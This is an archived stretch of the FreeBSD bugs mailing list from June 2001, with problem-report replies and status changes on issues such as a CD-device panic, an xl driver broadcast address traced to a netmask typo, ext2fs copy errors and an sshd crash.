gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f53LU2V66776; Sun, 3 Jun 2001 14:30:02 -0700 (PDT) (envelope-from gnats) Date: Sun, 3 Jun 2001 14:30:02 -0700 (PDT) Message-Id: <200106032130.f53LU2V66776@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Felix-Antoine Paradis Subject: Re: kern/27861: system crashes when trying to access /dev/acd0c Reply-To: Felix-Antoine Paradis Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/27861; it has been noted by GNATS. From: Felix-Antoine Paradis To: Cc: Subject: Re: kern/27861: system crashes when trying to access /dev/acd0c Date: Sun, 3 Jun 2001 17:20:07 -0400 (EDT) Well first, see if this is possible. You want to dump audio tracks to a file and I don't think it is possible. Use dagrab which is in the ports tree. > >Description: > if an AudioCD is placed into the CD-Rom drive any user's request to read it as a device panics the sistem. for example: > bash-2.05$ cat /dev/acd0c > /home/ivan/cd.rip > Note that I didn't have the opportunity to test this on other machines. My system - Celeron 333, 128MB Ram, Zida BX983D MB, Maxtor 90648D3 HDD, Riva TNT2 M64/32MB, TEAC-532B CD-Rom > N.B.: Your PR was misfilled. Felix-Antoine Paradis - reel@sympatico.ca && 1-418-261-0865 && 0xAF358809 - Quebec, Canada - Unix Consult Organization - "Obest plerumque iis qui discere volunt auctoritas eorum qui docent" - Ciceron To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jun 3 15:28:33 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4EBE937B405; Sun, 3 Jun 2001 15:28:31 -0700 (PDT) (envelope-from jdp@FreeBSD.org) Received: (from jdp@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f53MSV880545; Sun, 3 Jun 2001 15:28:31 -0700 (PDT) (envelope-from jdp) Date: Sun, 3 Jun 2001 15:28:31 -0700 (PDT) From: Message-Id: <200106032228.f53MSV880545@freefall.freebsd.org> To: blovett@bsdguru.com, jdp@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: i386/24871: Pagefaults occur at random on a 4.2-STABLE machine Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Pagefaults occur at random on a 4.2-STABLE machine State-Changed-From-To: feedback->closed State-Changed-By: jdp State-Changed-When: Sun Jun 3 15:26:10 PDT 2001 State-Changed-Why: Submitter has a new laptop and is unable to reproduce the problem. He suspects there may have been hardware problems in the old laptop. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=24871 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jun 3 15:30: 4 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6767E37B405 for ; Sun, 3 Jun 2001 15:30:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f53MU1T81345; Sun, 3 Jun 2001 15:30:01 -0700 (PDT) (envelope-from gnats) Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C5FD237B403 for ; Sun, 3 Jun 2001 15:24:44 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: (from nobody@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f53MOib78759; Sun, 3 Jun 2001 15:24:44 -0700 (PDT) (envelope-from nobody) Message-Id: <200106032224.f53MOib78759@freefall.freebsd.org> Date: Sun, 3 Jun 2001 15:24:44 -0700 (PDT) From: tundra@tundraware.com To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: kern/27862: xl driver defaults to incorrect broadcast address Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 27862 >Category: kern >Synopsis: xl driver defaults to incorrect broadcast address >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Jun 03 15:30:01 PDT 2001 >Closed-Date: >Last-Modified: >Originator: Tim Daneliuk >Release: 4.3 >Organization: TundraWare Inc. >Environment: FreeBSD eskimo.tundraware.com 4.3-RELEASE FreeBSD 4.3-RELEASE #0: Sat Jun 2 19:50:27 CDT 2001 toor@eskimo.tundraware.com:/usr/s rc/sys/compile/ESKIMO-4.3 i386 >Description: Running a 3c509C in a non-routable address space being set up in rc.conf as follows: ifconfig_xl1="inet 192.168.0.254 netmask 0xfffff00" This setup defaults to a broadcast address of 240.168.0.255 which I believe is bogus - it should be 192.168.0.255 - this seems to confuse programs like 'samba' that need broadcasting to work correctly. >How-To-Repeat: >Fix: Use the following line in rc.conf: ifconfig_xl1="inet 192.168.0.254 netmask 0xfffff00 broadcast 192.168.0.255" >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jun 3 15:33: 6 2001 Delivered-To: freebsd-bugs@freebsd.org Received: from wall.polstra.com (rtrwan160.accessone.com [206.213.115.74]) by hub.freebsd.org (Postfix) with ESMTP id 9E3FE37B401 for ; Sun, 3 Jun 2001 15:33:04 -0700 (PDT) (envelope-from jdp@wall.polstra.com) Received: from vashon.polstra.com (vashon.polstra.com [206.213.73.13]) by wall.polstra.com (8.11.3/8.11.1) with ESMTP id f53MWx034029; Sun, 3 Jun 2001 15:32:59 -0700 (PDT) (envelope-from jdp@wall.polstra.com) Received: (from jdp@localhost) by vashon.polstra.com (8.11.3/8.11.0) id f53MWw537804; Sun, 3 Jun 2001 15:32:58 -0700 (PDT) (envelope-from jdp) Date: Sun, 3 Jun 2001 15:32:58 -0700 (PDT) Message-Id: <200106032232.f53MWw537804@vashon.polstra.com> To: bugs@freebsd.org From: John Polstra Cc: blovett@bsdguru.com Subject: Re: i386/24871: Pagefaults occur at random on a 4.2-STABLE machine In-Reply-To: <20010602125013.A13069@bsdguru.com> References: <200106021928.f52JSdU14755@freefall.freebsd.org> <20010602125013.A13069@bsdguru.com> Organization: Polstra & Co., Seattle, WA Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org In article <20010602125013.A13069@bsdguru.com>, Ben Lovett wrote: > > > Since filing this PR I have acquired another laptop, and have not > noticed these symptoms since. I have a feeling now that there was some > problems with the hardware as when I returned the system to my employer, > they reloaded Windows on it, and experienced similar problems. With > crashes and the like (not that this is at all conclusive ;) Thanks for the update. I have gone ahead and closed the PR. If the problem surfaces again, we can always reopen it. John To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jun 3 20:21:52 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2AFD937B401; Sun, 3 Jun 2001 20:21:51 -0700 (PDT) (envelope-from dougb@FreeBSD.org) Received: (from dougb@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f543Lpj23584; Sun, 3 Jun 2001 20:21:51 -0700 (PDT) (envelope-from dougb) Date: Sun, 3 Jun 2001 20:21:51 -0700 (PDT) From: Message-Id: <200106040321.f543Lpj23584@freefall.freebsd.org> To: dougb@FreeBSD.org, freebsd-bugs@FreeBSD.org, wpaul@FreeBSD.org Subject: Re: kern/27862: xl driver defaults to incorrect broadcast address Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: xl driver defaults to incorrect broadcast address Responsible-Changed-From-To: freebsd-bugs->wpaul Responsible-Changed-By: dougb Responsible-Changed-When: Sun Jun 3 20:21:28 PDT 2001 Responsible-Changed-Why: Over to the NIC guru http://www.FreeBSD.org/cgi/query-pr.cgi?pr=27862 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jun 3 21:32:11 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1B8E537B401; Sun, 3 Jun 2001 21:32:07 -0700 (PDT) (envelope-from dougb@FreeBSD.org) Received: (from dougb@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f544W5d32363; Sun, 3 Jun 2001 21:32:05 -0700 (PDT) (envelope-from dougb) Date: Sun, 3 Jun 2001 21:32:05 -0700 (PDT) From: Message-Id: <200106040432.f544W5d32363@freefall.freebsd.org> To: LLazarte@mat.unb.br, dougb@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: i386/10690: Installation freezes after device selection, while "probing". Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Installation freezes after device selection, while "probing". State-Changed-From-To: feedback->closed State-Changed-By: dougb State-Changed-When: Sun Jun 3 21:30:48 PDT 2001 State-Changed-Why: Feedback timeout, and high likelihood of being fixed in more recent versions. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=10690 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jun 3 21:35: 4 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2146B37B401; Sun, 3 Jun 2001 21:35:02 -0700 (PDT) (envelope-from dougb@FreeBSD.org) Received: (from dougb@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f544Yq232686; Sun, 3 Jun 2001 21:34:52 -0700 (PDT) (envelope-from dougb) Date: Sun, 3 Jun 2001 21:34:52 -0700 (PDT) From: Message-Id: <200106040434.f544Yq232686@freefall.freebsd.org> To: lyndon@MessagingDirect.COM, dougb@FreeBSD.org, dougb@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: gnu/27715: UUCP doesn't recognize traditional BSD config files Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: UUCP doesn't recognize traditional BSD config files State-Changed-From-To: feedback->open State-Changed-By: dougb State-Changed-When: Sun Jun 3 21:33:44 PDT 2001 State-Changed-Why: I misunderstood the "config" aspect of this PR, set it free and hope someone adopts it. Responsible-Changed-From-To: dougb->freebsd-bugs Responsible-Changed-By: dougb Responsible-Changed-When: Sun Jun 3 21:33:44 PDT 2001 Responsible-Changed-Why: http://www.FreeBSD.org/cgi/query-pr.cgi?pr=27715 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jun 3 21:41:16 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6415737B403; Sun, 3 Jun 2001 21:41:13 -0700 (PDT) (envelope-from mikeh@FreeBSD.org) Received: (from mikeh@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f544fDU33050; Sun, 3 Jun 2001 21:41:13 -0700 (PDT) (envelope-from mikeh) Date: Sun, 3 Jun 2001 21:41:13 -0700 (PDT) From: Message-Id: <200106040441.f544fDU33050@freefall.freebsd.org> To: mikeh@FreeBSD.org, freebsd-bugs@FreeBSD.org, mikeh@FreeBSD.org Subject: Re: bin/11746: Add support for Solaris mailboxes Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Add support for Solaris mailboxes Responsible-Changed-From-To: freebsd-bugs->mikeh Responsible-Changed-By: mikeh Responsible-Changed-When: Sun Jun 3 21:40:05 PDT 2001 Responsible-Changed-Why: I'll take a look at this. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=11746 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jun 3 21:55:45 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4688737B401; Sun, 3 Jun 2001 21:55:44 -0700 (PDT) (envelope-from mikeh@FreeBSD.org) Received: (from mikeh@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f544tic34023; Sun, 3 Jun 2001 21:55:44 -0700 (PDT) (envelope-from mikeh) Date: Sun, 3 Jun 2001 21:55:44 -0700 (PDT) From: Message-Id: <200106040455.f544tic34023@freefall.freebsd.org> To: mikeh@FreeBSD.org, freebsd-bugs@FreeBSD.org, mikeh@FreeBSD.org Subject: Re: bin/8322: Mail doesn't respect REPLYTO in .mailrc Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Mail doesn't respect REPLYTO in .mailrc Responsible-Changed-From-To: freebsd-bugs->mikeh Responsible-Changed-By: mikeh Responsible-Changed-When: Sun Jun 3 21:55:21 PDT 2001 Responsible-Changed-Why: I'll take a look at this. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=8322 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jun 3 22:24:10 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A4FC737B405; Sun, 3 Jun 2001 22:24:09 -0700 (PDT) (envelope-from mikeh@FreeBSD.org) Received: (from mikeh@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f545O9M43131; Sun, 3 Jun 2001 22:24:09 -0700 (PDT) (envelope-from mikeh) Date: Sun, 3 Jun 2001 22:24:09 -0700 (PDT) From: Message-Id: <200106040524.f545O9M43131@freefall.freebsd.org> To: mikeh@FreeBSD.org, freebsd-bugs@FreeBSD.org, mikeh@FreeBSD.org Subject: Re: bin/9494: new option to prevent mail from sending mail without input Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: new option to prevent mail from sending mail without input Responsible-Changed-From-To: freebsd-bugs->mikeh Responsible-Changed-By: mikeh Responsible-Changed-When: Sun Jun 3 22:22:56 PDT 2001 Responsible-Changed-Why: IMO this condition should be tested for in the script, but I'll consider it anyways. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=9494 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jun 3 23:22:32 2001 Delivered-To: freebsd-bugs@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 618) id CBC0737B40C; Sun, 3 Jun 2001 23:22:24 -0700 (PDT) Subject: Re: kern/27862: xl driver defaults to incorrect broadcast address In-Reply-To: <200106040321.f543Lpj23584@freefall.freebsd.org> from "dougb@FreeBSD.org" at "Jun 3, 2001 08:21:51 pm" To: dougb@FreeBSD.org Date: Sun, 3 Jun 2001 23:22:24 -0700 (PDT) Cc: freebsd-bugs@FreeBSD.org X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Message-Id: <20010604062224.CBC0737B40C@hub.freebsd.org> From: wpaul@FreeBSD.ORG (Bill Paul) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > Synopsis: xl driver defaults to incorrect broadcast address > > Responsible-Changed-From-To: freebsd-bugs->wpaul > Responsible-Changed-By: dougb > Responsible-Changed-When: Sun Jun 3 20:21:28 PDT 2001 > Responsible-Changed-Why: > > Over to the NIC guru > > http://www.FreeBSD.org/cgi/query-pr.cgi?pr=27862 > GRRRRRRRR!!!!! You didn't even bother to read this thing, did you! You just saw "xl drvier" in the subject line and immediately assumed it was a complicated issue that only I could figure out!! Well you were WRONG!! This is **NOT** a driver bug!!! In fact it's not even a bug at all: it's a configuration error! The user typed 0xfffff00 instead 0xffffff00!!! All you had to do was take 5 minutes to read the stupid problem description and you could have closed out this PR yourself instead of shuffling it along to me! It's a damn typo, for crying out loud!!! Must... control... fist of death... -Bill To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jun 3 23:34:30 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2724037B401; Sun, 3 Jun 2001 23:34:29 -0700 (PDT) (envelope-from dd@FreeBSD.org) Received: (from dd@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f546YTg59753; Sun, 3 Jun 2001 23:34:29 -0700 (PDT) (envelope-from dd) Date: Sun, 3 Jun 2001 23:34:29 -0700 (PDT) From: Message-Id: <200106040634.f546YTg59753@freefall.freebsd.org> To: dd@FreeBSD.org, freebsd-bugs@FreeBSD.org, dd@FreeBSD.org Subject: Re: bin/27858: There is no urandom(4) man page Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: There is no urandom(4) man page Responsible-Changed-From-To: freebsd-bugs->dd Responsible-Changed-By: dd Responsible-Changed-When: Sun Jun 3 23:34:01 PDT 2001 Responsible-Changed-Why: I'll commit the first patch tomorrow. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=27858 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jun 3 23:35: 7 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2861137B405; Sun, 3 Jun 2001 23:35:06 -0700 (PDT) (envelope-from dd@FreeBSD.org) Received: (from dd@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f546Z6o59862; Sun, 3 Jun 2001 23:35:06 -0700 (PDT) (envelope-from dd) Date: Sun, 3 Jun 2001 23:35:06 -0700 (PDT) From: Message-Id: <200106040635.f546Z6o59862@freefall.freebsd.org> To: setantae@submonkey.net, dd@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: i386/27778: I am unable to read files on a Win2k NTFS slice Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: I am unable to read files on a Win2k NTFS slice State-Changed-From-To: open->closed State-Changed-By: dd State-Changed-When: Sun Jun 3 23:34:53 PDT 2001 State-Changed-Why: Originator reports that the problem has been fixed. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=27778 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 4 0: 0:20 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 30EA037B405 for ; Mon, 4 Jun 2001 00:00:16 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f5470G661686; Mon, 4 Jun 2001 00:00:16 -0700 (PDT) (envelope-from gnats) Date: Mon, 4 Jun 2001 00:00:16 -0700 (PDT) Message-Id: <200106040700.f5470G661686@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Peter Pentchev Subject: Re: gnu/27842: cp has weird errors trying to copy from ext2fs to freebsd Reply-To: Peter Pentchev Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR gnu/27842; it has been noted by GNATS. From: Peter Pentchev To: ancient@gscyclone.com Cc: freebsd-gnats-submit@FreeBSD.org Subject: Re: gnu/27842: cp has weird errors trying to copy from ext2fs to freebsd Date: Mon, 4 Jun 2001 09:53:38 +0300 On Sat, Jun 02, 2001 at 06:32:36PM -0700, ancient@gscyclone.com wrote: > > >Number: 27842 > >Category: gnu > >Synopsis: cp has weird errors trying to copy from ext2fs to freebsd > >Originator: Gary > >Release: 4.3-STABLE > >Description: > I mount a linux ext2fs drive to /mnt/linux. When I try and cp anything from the linux drive, I get the following message(s): > > cp: Invalid arguement > > I can read files on the drive Are you using cp(1) with the '-p' option? If so, I do believe this has something to do with PR bin/20646: for more information, see http://www.FreeBSD.org/cgi/query-pr.cgi?pr=20646 Anyway, can you do an 'ls -l' on the files on the ext2fs system that you are trying to copy, and an 'ls -l' on the files on the UFS system after the copying ends, and also paste the exact command line that you are using? G'luck, Peter -- I am not the subject of this sentence. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 4 1:20: 5 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 751C237B403 for ; Mon, 4 Jun 2001 01:20:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f548K1a75395; Mon, 4 Jun 2001 01:20:01 -0700 (PDT) (envelope-from gnats) Received: from softwareliberty.org (freebsd.sinica.edu.tw [140.109.13.51]) by hub.freebsd.org (Postfix) with ESMTP id ED48A37B401 for ; Mon, 4 Jun 2001 01:10:42 -0700 (PDT) (envelope-from ycheng@softwareliberty.org) Received: by softwareliberty.org (Postfix, from userid 1000) id 949C87601; Mon, 4 Jun 2001 16:10:44 +0800 (CST) Message-Id: <20010604081044.949C87601@softwareliberty.org> Date: Mon, 4 Jun 2001 16:10:44 +0800 (CST) From: ycheng@softwareliberty.org Reply-To: ycheng@softwareliberty.org To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: misc/27870: mail-list subscribtion method change. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 27870 >Category: misc >Synopsis: mail-list subscribtion method change. >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Jun 04 01:20:01 PDT 2001 >Closed-Date: >Last-Modified: >Originator: Yuan-Chen Cheng >Release: FreeBSD 4.2-RELEASE i386 >Organization: >Environment: >Description: please update http://www.freebsd.sinica.edu.tw/support.html#mailing-list Traditional Chinese mail-list (Big5 Encoding) to http://freebsd.sinica.edu.tw/mailman/listinfo thank you. >How-To-Repeat: >Fix: >Release-Note: >Audit-Trail: >Unformatted: change-request To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 4 2:20: 5 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 53AE637B401 for ; Mon, 4 Jun 2001 02:20:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f549K3L82679; Mon, 4 Jun 2001 02:20:03 -0700 (PDT) (envelope-from gnats) Date: Mon, 4 Jun 2001 02:20:03 -0700 (PDT) Message-Id: <200106040920.f549K3L82679@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Storms of Perfection Subject: Re: gnu/27842: cp has weird errors trying to copy from ext2fs to freebsd Reply-To: Storms of Perfection Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR gnu/27842; it has been noted by GNATS. From: Storms of Perfection To: Peter Pentchev Cc: freebsd-gnats-submit@FreeBSD.org Subject: Re: gnu/27842: cp has weird errors trying to copy from ext2fs to freebsd Date: Mon, 04 Jun 2001 05:23:34 -0400 Actually, I found out why. I had to use the fsck_ext2fs on the ext2 partition, it cleaned some of the errors up on the drive and I can copy everything now. Perhaps someone needs to patch mount_ext2 to include a message about using the FreeBSD port "fsck_ext2fs" on a dirty ext2fs filesystem.. Gary >Are you using cp(1) with the '-p' option? If so, I do believe this has >something to do with PR bin/20646: for more information, see >http://www.FreeBSD.org/cgi/query-pr.cgi?pr=20646 > >Anyway, can you do an 'ls -l' on the files on the ext2fs system that >you are trying to copy, and an 'ls -l' on the files on the UFS system >after the copying ends, and also paste the exact command line that >you are using? > >G'luck, >Peter > >-- >I am not the subject of this sentence. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 4 3:16:11 2001 Delivered-To: freebsd-bugs@freebsd.org Received: from relay.convey.ru (relay.convey.ru [195.182.128.7]) by hub.freebsd.org (Postfix) with ESMTP id 7E91E37B401 for ; Mon, 4 Jun 2001 03:16:08 -0700 (PDT) (envelope-from slw@relay.convey.ru) Received: (from slw@localhost) by relay.convey.ru (8.11.0/8.11.0) id f54AFna07001; Mon, 4 Jun 2001 14:15:49 +0400 (MSK DST) Date: Mon, 4 Jun 2001 14:15:49 +0400 From: Slawa Olhovchenkov To: Poul-Henning Kamp Cc: freebsd-bugs@FreeBSD.org Subject: Re: kern/25198: kernel crash on fsck Message-ID: <20010604141549.B5866@convey.ru> References: <20010529115004.C14545@convey.ru> <24647.991126987@critter> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <24647.991126987@critter>; from phk@critter.freebsd.dk on Tue, May 29, 2001 at 11:03:07AM +0200 X-NCC-RegID: ru.convey Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, May 29, 2001 at 11:03:07AM +0200, Poul-Henning Kamp wrote: > In message <20010529115004.C14545@convey.ru>, Slawa Olhovchenkov writes: > >On Mon, May 28, 2001 at 01:58:33PM -0700, phk@FreeBSD.org wrote: > >> Synopsis: kernel crash on fsck > >> > >> Can you tell us if this still happens ? > > > >yes, 10x In sense - all is OK. > And when is your kernel sources from ? CVSup at 04/21/01 22:19:35. Before this date I did not check this bug. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 4 3:30: 5 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 89C1A37B405 for ; Mon, 4 Jun 2001 03:30:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f54AU3A90856; Mon, 4 Jun 2001 03:30:03 -0700 (PDT) (envelope-from gnats) Date: Mon, 4 Jun 2001 03:30:03 -0700 (PDT) Message-Id: <200106041030.f54AU3A90856@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: David Malone Subject: Re: bin/27860: sshd caught signal 10 Reply-To: David Malone Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/27860; it has been noted by GNATS. From: David Malone To: Yoshihiro Koya Cc: FreeBSD-gnats-submit@freebsd.org Subject: Re: bin/27860: sshd caught signal 10 Date: Mon, 4 Jun 2001 11:28:31 +0100 On Mon, Jun 04, 2001 at 05:30:53AM +0900, Yoshihiro Koya wrote: > >How-To-Repeat: > Type > > % slogin localhost -l xxxx<10000 times x's>xxx I've reproduced this with a -current machine at home 